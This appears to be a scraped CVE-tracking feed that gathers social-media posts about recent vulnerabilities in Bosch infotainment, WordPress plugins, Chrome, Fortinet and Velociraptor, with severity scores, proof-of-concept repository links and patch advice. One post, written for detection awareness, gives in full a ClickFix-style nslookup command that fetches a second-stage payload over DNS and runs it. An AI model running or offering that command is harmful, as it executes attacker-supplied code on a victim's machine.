The specific flaw exists within the Bluetooth stack developed by Alps Alpine of the Infotainment ECU manufactured by Bosch. The issue results from the lack of proper boundary validation of user-supplied data, which can result in a stack-based buffer overflow when receiving a specific packet on the established upper layer L2CAP channel. An attacker can leverage this vulnerability to obtain remote c

thehackerwire@mastodon.social at 2026-02-16T22:38:09.000Z ##

🟠 CVE-2025-32061 - High (8.8)

The specific flaw exists within the Bluetooth stack developed by Alps Alpine of the Infotainment ECU manufactured by Bosch. The issue results from the lack of proper boundary validation of user-supplied data, which can result in a stack-based buff...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-16T22:38:09.000Z ##

🟠 CVE-2025-32061 - High (8.8)

The specific flaw exists within the Bluetooth stack developed by Alps Alpine of the Infotainment ECU manufactured by Bosch. The issue results from the lack of proper boundary validation of user-supplied data, which can result in a stack-based buff...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-32059
(8.8 HIGH)

EPSS: 0.02%

updated 2026-02-15T12:30:25

2 posts

The specific flaw exists within the Bluetooth stack developed by Alps Alpine of the Infotainment ECU manufactured by Bosch. The issue results from the lack of proper boundary validation of user-supplied data, which can result in a stack-based buffer overflow when receiving a specific packet on the established upper layer L2CAP channel. An attacker can leverage this vulnerability to obtain remote c

thehackerwire@mastodon.social at 2026-02-16T22:38:18.000Z ##

🟠 CVE-2025-32059 - High (8.8)

The specific flaw exists within the Bluetooth stack developed by Alps Alpine of the Infotainment ECU manufactured by Bosch. The issue results from the lack of proper boundary validation of user-supplied data, which can result in a stack-based buff...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-16T22:38:18.000Z ##

🟠 CVE-2025-32059 - High (8.8)

The specific flaw exists within the Bluetooth stack developed by Alps Alpine of the Infotainment ECU manufactured by Bosch. The issue results from the lack of proper boundary validation of user-supplied data, which can result in a stack-based buff...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1750
(8.8 HIGH)

EPSS: 0.03%

updated 2026-02-15T06:31:38

2 posts

The Ecwid by Lightspeed Ecommerce Shopping Cart plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 7.0.7. This is due to a missing capability check in the 'save_custom_user_profile_fields' function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to supply the 'ec_store_admin_access' parameter during a

thehackerwire@mastodon.social at 2026-02-16T22:38:28.000Z ##

🟠 CVE-2026-1750 - High (8.8)

The Ecwid by Lightspeed Ecommerce Shopping Cart plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 7.0.7. This is due to a missing capability check in the 'save_custom_user_profile_fields' function. Th...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-16T22:38:28.000Z ##

🟠 CVE-2026-1750 - High (8.8)

The Ecwid by Lightspeed Ecommerce Shopping Cart plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 7.0.7. This is due to a missing capability check in the 'save_custom_user_profile_fields' function. Th...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1490
(9.8 CRITICAL)

EPSS: 0.08%

updated 2026-02-15T04:15:53.783000

4 posts

The Spam protection, Anti-Spam, FireWall by CleanTalk plugin for WordPress is vulnerable to unauthorized Arbitrary Plugin Installation due to an authorization bypass via reverse DNS (PTR record) spoofing on the 'checkWithoutToken' function in all versions up to, and including, 6.71. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins which can be leverage

1 repos

https://github.com/comthompson30/CVE-2026-1490

beyondmachines1 at 2026-02-17T08:01:23.281Z ##

Critical CleanTalk Plugin Vulnerability Allows WordPress Site Takeover via DNS Spoofing

A critical vulnerability in the CleanTalk WordPress plugin (CVE-2026-1490) allows unauthenticated attackers to bypass authorization via Reverse DNS spoofing and install arbitrary plugins, leading to full site takeover.

**If you are using ""Spam protection, Anti-Spam, FireWall by CleanTalk", update ASAP. Never rely on DNS records for authentication because they are easily spoofed by attackers.**

beyondmachines.net/event_detai

##

thehackerwire@mastodon.social at 2026-02-16T22:57:28.000Z ##

🔴 CVE-2026-1490 - Critical (9.8)

The Spam protection, Anti-Spam, FireWall by CleanTalk plugin for WordPress is vulnerable to unauthorized Arbitrary Plugin Installation due to an authorization bypass via reverse DNS (PTR record) spoofing on the 'checkWithoutToken' function in all ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

beyondmachines1@infosec.exchange at 2026-02-17T08:01:23.000Z ##

Critical CleanTalk Plugin Vulnerability Allows WordPress Site Takeover via DNS Spoofing

A critical vulnerability in the CleanTalk WordPress plugin (CVE-2026-1490) allows unauthenticated attackers to bypass authorization via Reverse DNS spoofing and install arbitrary plugins, leading to full site takeover.

**If you are using ""Spam protection, Anti-Spam, FireWall by CleanTalk", update ASAP. Never rely on DNS records for authentication because they are easily spoofed by attackers.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

thehackerwire@mastodon.social at 2026-02-16T22:57:28.000Z ##

🔴 CVE-2026-1490 - Critical (9.8)

The Spam protection, Anti-Spam, FireWall by CleanTalk plugin for WordPress is vulnerable to unauthorized Arbitrary Plugin Installation due to an authorization bypass via reverse DNS (PTR record) spoofing on the 'checkWithoutToken' function in all ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2441
(8.8 HIGH)

EPSS: 0.03%

updated 2026-02-13T21:43:11.137000

5 posts

Use after free in CSS in Google Chrome prior to 145.0.7632.75 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)

1 repos

https://github.com/b1gchoi/CVE-2026-2441_POC

youranonnewsirc@nerdculture.de at 2026-02-17T09:50:12.000Z ##

Geopolitical: US-Iran nuclear talks resumed in Geneva (Feb 16). The Pentagon is also reviewing ties with Anthropic over AI usage safeguards (Feb 16). Tech: Majorana qubits were decoded, marking a breakthrough for robust quantum computing (Feb 16). Cybersecurity: Google patched an actively exploited Chrome zero-day (CVE-2026-2441), and Japan's Washington Hotel disclosed a ransomware attack from Feb 13.

#AnonNews_irc #Cybersecurity #News

##

undercodenews@mastodon.social at 2026-02-17T06:30:39.000Z ##

Zero-Day Chaos: Actively Exploited Google Chrome Flaw Triggers Emergency Global Patch

Introduction: A Silent Browser Bug Turns Into a Global Security Emergency A critical security vulnerability in Google Chrome has escalated into an active, real-world threat, forcing an emergency response from the browser’s developers. The flaw, tracked as CVE-2026-2441, sits deep inside Chrome’s CSS engine and has already been exploited in the wild, raising alarms across the…

undercodenews.com/zero-day-cha

##

youranonnewsirc@nerdculture.de at 2026-02-17T03:50:08.000Z ##

Google issued an emergency patch for an actively exploited Chrome zero-day (CVE-2026-2441) on Feb 16, 2026. A critical BeyondTrust vulnerability (CVE-2026-1731) is also under active exploitation. State-backed actors are increasingly using AI in cyberattacks. Geopolitically, the EU warned of Russia's evolving cyber warfare tactics. SpaceX and xAI are competing in a Pentagon AI drone tech contest.

#Cybersecurity #AI #Geopolitics

##

youranonnewsirc@nerdculture.de at 2026-02-17T09:50:12.000Z ##

Geopolitical: US-Iran nuclear talks resumed in Geneva (Feb 16). The Pentagon is also reviewing ties with Anthropic over AI usage safeguards (Feb 16). Tech: Majorana qubits were decoded, marking a breakthrough for robust quantum computing (Feb 16). Cybersecurity: Google patched an actively exploited Chrome zero-day (CVE-2026-2441), and Japan's Washington Hotel disclosed a ransomware attack from Feb 13.

#AnonNews_irc #Cybersecurity #News

##

youranonnewsirc@nerdculture.de at 2026-02-17T03:50:08.000Z ##

Google issued an emergency patch for an actively exploited Chrome zero-day (CVE-2026-2441) on Feb 16, 2026. A critical BeyondTrust vulnerability (CVE-2026-1731) is also under active exploitation. State-backed actors are increasingly using AI in cyberattacks. Geopolitically, the EU warned of Russia's evolving cyber warfare tactics. SpaceX and xAI are competing in a Pentagon AI drone tech contest.

#Cybersecurity #AI #Geopolitics

##

CVE-2025-69770
(10.0 CRITICAL)

EPSS: 0.09%

updated 2026-02-13T21:43:11.137000

1 posts

A zip slip vulnerability in the /DesignTools/SkinList.aspx endpoint of MojoPortal CMS v2.9.0.1 allows attackers to execute arbitrary commands via uploading a crafted zip file.

Matchbook3469@mastodon.social at 2026-02-17T07:40:47.000Z ##

🚨 New security advisory:

CVE-2025-69770 affects multiple systems.

• Impact: Remote code execution or complete system compromise possible
• Risk: Attackers can gain full control of affected systems
• Mitigation: Patch immediately or isolate affected systems

Full breakdown:
advisory.yazoul.net/cve/cve-20

#Cybersecurity #ZeroDay #ThreatIntel

##

CVE-2026-1358
(9.8 CRITICAL)

EPSS: 0.13%

updated 2026-02-13T14:23:48.007000

2 posts

Airleader Master versions 6.381 and prior allow for file uploads without restriction to multiple webpages running maximum privileges. This could allow an unauthenticated user to potentially obtain remote code execution on the server.

beyondmachines1 at 2026-02-17T09:01:23.225Z ##

Critical RCE Vulnerability in Airleader Master Industrial Monitoring Systems

Airleader GmbH patched a critical unauthenticated remote code execution vulnerability (CVE-2026-1358) in its Airleader Master platform that could allow attackers to upload arbitrary files and take control of the system.

**Make sure your Airleader Master is isolated from the internet and accessible only from trusted networks. Then plan a very quick update to version 6.386. If you have isolated the equipment you have a bit of breathing room, but don't forget to patch. Any isolation will be breached given enough time.**

beyondmachines.net/event_detai

##

beyondmachines1@infosec.exchange at 2026-02-17T09:01:23.000Z ##

Critical RCE Vulnerability in Airleader Master Industrial Monitoring Systems

Airleader GmbH patched a critical unauthenticated remote code execution vulnerability (CVE-2026-1358) in its Airleader Master platform that could allow attackers to upload arbitrary files and take control of the system.

**Make sure your Airleader Master is isolated from the internet and accessible only from trusted networks. Then plan a very quick update to version 6.386. If you have isolated the equipment you have a bit of breathing room, but don't forget to patch. Any isolation will be breached given enough time.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2024-43468
(9.8 CRITICAL)

EPSS: 87.46%

updated 2026-02-13T14:04:05.243000

2 posts

Microsoft Configuration Manager Remote Code Execution Vulnerability

3 repos

https://github.com/nikallass/CVE-2024-43468_mTLS_go

https://github.com/tadash10/Detailed-Analysis-and-Mitigation-Strategies-for-CVE-2024-38124-and-CVE-2024-43468

https://github.com/synacktiv/CVE-2024-43468

PC_Fluesterer@social.tchncs.de at 2026-02-17T11:47:21.000Z ##

Microsoft: Anderthalb Jahre alte Schwachstelle wird angegriffen

Im Oktober 2024 hat Microsoft (MS) eine Sicherheitslücke gestopft, die mit dem Risiko 9,8 von 10 eingestuft wurde. Oder sollten wir sagen: Hintertür? Die Schwachstelle CVE-2024-43468 besteht nämlich in einer unzureichenden Überprüfung und Reinigung von Benutzer-Eingaben. Will sagen: Wer die "passenden" Eingabewerte kennt, kann von Ferne und ohne Autorisierung Code ausführen (RCE, der GAU unter den Sicherheitslücken). Updates gegen diese Hintertür müssen sofort installiert werden - seit anderthalb Jahren! CVE-2024-43468 wurde gerade in den Katalog der bekanntermaßen ausgenutzten Sicherheitslücken (KEV) aufgenomm

pc-fluesterer.info/wordpress/2

#Allgemein #Hintergrund #Warnung #cybercrime #exploits #hintertür #Microsoft #UnplugTrump

##

PC_Fluesterer@social.tchncs.de at 2026-02-17T11:47:21.000Z ##

Microsoft: Anderthalb Jahre alte Schwachstelle wird angegriffen

Im Oktober 2024 hat Microsoft (MS) eine Sicherheitslücke gestopft, die mit dem Risiko 9,8 von 10 eingestuft wurde. Oder sollten wir sagen: Hintertür? Die Schwachstelle CVE-2024-43468 besteht nämlich in einer unzureichenden Überprüfung und Reinigung von Benutzer-Eingaben. Will sagen: Wer die "passenden" Eingabewerte kennt, kann von Ferne und ohne Autorisierung Code ausführen (RCE, der GAU unter den Sicherheitslücken). Updates gegen diese Hintertür müssen sofort installiert werden - seit anderthalb Jahren! CVE-2024-43468 wurde gerade in den Katalog der bekanntermaßen ausgenutzten Sicherheitslücken (KEV) aufgenomm

pc-fluesterer.info/wordpress/2

#Allgemein #Hintergrund #Warnung #cybercrime #exploits #hintertür #Microsoft #UnplugTrump

##

CVE-2026-22903
(9.8 CRITICAL)

EPSS: 0.57%

updated 2026-02-09T16:08:35.290000

1 posts

An unauthenticated remote attacker can send a crafted HTTP request containing an overly long SESSIONID cookie. This can trigger a stack buffer overflow in the modified lighttpd server, causing it to crash and potentially enabling remote code execution due to missing stack protections.

Matchbook3469@mastodon.social at 2026-02-17T13:44:40.000Z ##

🚨 New security advisory:

CVE-2026-22903 affects multiple systems.

• Impact: Remote code execution or complete system compromise possible
• Risk: Attackers can gain full control of affected systems
• Mitigation: Patch immediately or isolate affected systems

Full breakdown:
advisory.yazoul.net/cve/cve-20

#Cybersecurity #VulnerabilityManagement #CyberSec

##

CVE-2026-1868
(9.9 CRITICAL)

EPSS: 0.03%

updated 2026-02-09T16:08:35.290000

1 posts

GitLab has remediated a vulnerability in the Duo Workflow Service component of GitLab AI Gateway affecting all versions of the AI Gateway from 18.1.6, 18.2.6, 18.3.1 to 18.6.1, 18.7.0, and 18.8.0 in which AI Gateway was vulnerable to insecure template expansion of user supplied data via crafted Duo Agent Platform Flow definitions. This vulnerability could be used to cause Denial of Service or gain

Matchbook3469@mastodon.social at 2026-02-17T11:02:00.000Z ##

🚨 New security advisory:

CVE-2026-1868 affects multiple systems.

• Impact: Remote code execution or complete system compromise possible
• Risk: Attackers can gain full control of affected systems
• Mitigation: Patch immediately or isolate affected systems

Full breakdown:
advisory.yazoul.net/cve/cve-20

#Cybersecurity #SecurityPatching #HackerNews

##

CVE-2025-64155
(9.8 CRITICAL)

EPSS: 0.04%

updated 2026-01-20T16:16:06.200000

2 posts

An improper neutralization of special elements used in an os command ('os command injection') vulnerability in Fortinet FortiSIEM 7.4.0, FortiSIEM 7.3.0 through 7.3.4, FortiSIEM 7.1.0 through 7.1.8, FortiSIEM 7.0.0 through 7.0.4, FortiSIEM 6.7.0 through 6.7.10 may allow an attacker to execute unauthorized code or commands via crafted TCP requests.

4 repos

https://github.com/Mefhika120/Ashwesker-CVE-2025-64155

https://github.com/purehate/CVE-2025-64155-hunter

https://github.com/cyberdudebivash/CYBERDUDEBIVASH-FortiSIEM-CVE-2025-64155-Scanner

https://github.com/horizon3ai/CVE-2025-64155

CVE-2026-20965
(7.5 HIGH)

EPSS: 0.03%

updated 2026-01-16T16:23:11.237000

2 posts

Improper verification of cryptographic signature in Windows Admin Center allows an authorized attacker to elevate privileges locally.

_r_netsec at 2026-02-17T14:43:09.069Z ##

CVE-2026-20965: Cymulate Research Labs Discovers Token Validation Flaw that Leads to Tenant-Wide RCE in Azure Windows Admin Center cymulate.com/blog/cve-2026-209

##

_r_netsec@infosec.exchange at 2026-02-17T14:43:09.000Z ##

CVE-2026-20965: Cymulate Research Labs Discovers Token Validation Flaw that Leads to Tenant-Wide RCE in Azure Windows Admin Center cymulate.com/blog/cve-2026-209

##

CVE-2025-59922
(7.2 HIGH)

EPSS: 0.05%

updated 2026-01-14T21:38:33.547000

2 posts

An improper neutralization of special elements used in an SQL command ('SQL Injection') vulnerability [CWE-89] vulnerability in Fortinet FortiClientEMS 7.4.3 through 7.4.4, FortiClientEMS 7.4.0 through 7.4.1, FortiClientEMS 7.2.0 through 7.2.10, FortiClientEMS 7.0 all versions may allow an authenticated attacker with at least read-only admin permission to execute unauthorized SQL code or commands

_r_netsec at 2026-02-17T14:43:07.235Z ##

Fortinet Forticlient EMS RCE CVE-2025-59922 and one IMG tag to rule them all baldur.dk/blog/fortinet-ems-rc

##

_r_netsec@infosec.exchange at 2026-02-17T14:43:07.000Z ##

Fortinet Forticlient EMS RCE CVE-2025-59922 and one IMG tag to rule them all baldur.dk/blog/fortinet-ems-rc

##

CVE-2025-6264
(5.5 MEDIUM)

EPSS: 0.06%

updated 2025-10-23T01:00:00.913000

2 posts

Velociraptor allows collection of VQL queries packaged into Artifacts from endpoints. These artifacts can be used to do anything and usually run with elevated permissions.  To limit access to some dangerous artifact, Velociraptor allows for those to require high permissions like EXECVE to launch. The Admin.Client.UpdateClientConfig is an artifact used to update the client's configuration. This ar

1 repos

https://github.com/Al-Lord0x/CVE-2025-62641

TrustedAlpaca at 2026-02-17T08:13:19.911Z ##

cmd /c "nslookup example.com 192.168.1[.]1 | findstr "^Name:" | for /f "tokens=1,* delims=:" %a in ('more') do @echo %b" | cmd && exit\1

To an untrained eye, the above command might not look suspicious, as it uses a legitimate Windows tool called nslookup, but in reality the command is part of a staged infection as it delivers a second-stage payload via DNS that is controlled by the attacker.

Just because a legitimate executable runs commands doesn't mean that the binary itself or its parameters can't be abused to deliver or execute something malicious. The same goes for Velociraptor version 0.73.4.0, which contains a privilege escalation vulnerability under CVE-2025-6264. It is a legitimate DFIR tool, but because of its vulnerability, ransomware gangs use it to elevate privileges and execute malicious commands with higher privileges.

When detecting malicious activity, context and the commands executed are very important, because one technique used by threat actors to stay undetected as long as possible is abusing legitimate tools or built-in Windows executables to draw less attention to their malicious activities. To an untrained eye, such commands can look legitimate because the executables are reputable, they may be attributed as false positives or fly under the radar if detection engineering is not mature enough.

##

TrustedAlpaca@infosec.exchange at 2026-02-17T08:13:19.000Z ##

cmd /c "nslookup example.com 192.168.1[.]1 | findstr "^Name:" | for /f "tokens=1,* delims=:" %a in ('more') do @echo %b" | cmd && exit\1

To an untrained eye, the above command might not look suspicious, as it uses a legitimate Windows tool called nslookup, but in reality the command is part of a staged infection as it delivers a second-stage payload via DNS that is controlled by the attacker.

Just because a legitimate executable runs commands doesn't mean that the binary itself or its parameters can't be abused to deliver or execute something malicious. The same goes for Velociraptor version 0.73.4.0, which contains a privilege escalation vulnerability under CVE-2025-6264. It is a legitimate DFIR tool, but because of its vulnerability, ransomware gangs use it to elevate privileges and execute malicious commands with higher privileges.

When detecting malicious activity, context and the commands executed are very important, because one technique used by threat actors to stay undetected as long as possible is abusing legitimate tools or built-in Windows executables to draw less attention to their malicious activities. To an untrained eye, such commands can look legitimate because the executables are reputable, they may be attributed as false positives or fly under the radar if detection engineering is not mature enough.

#Malware #ThreatIntel #ThreatIntelligence #ClickFix #SOC #DFIR #Microsoft

##

CVE-2026-02447
(0 None)

EPSS: 0.00%

1 posts

N/A

Mozilla@activitypub.awakari.com at 2026-02-17T05:40:00.000Z ## Firefox 147.0.4: Mozilla исправила пустую страницу новой вкладки и уязвимость в libvpx (CVE-2026-02447) Mozilla Firefox 147.0.4 — четвёртое...

#Технологии

Origin | Interest | Match ##

Visit counter For Websites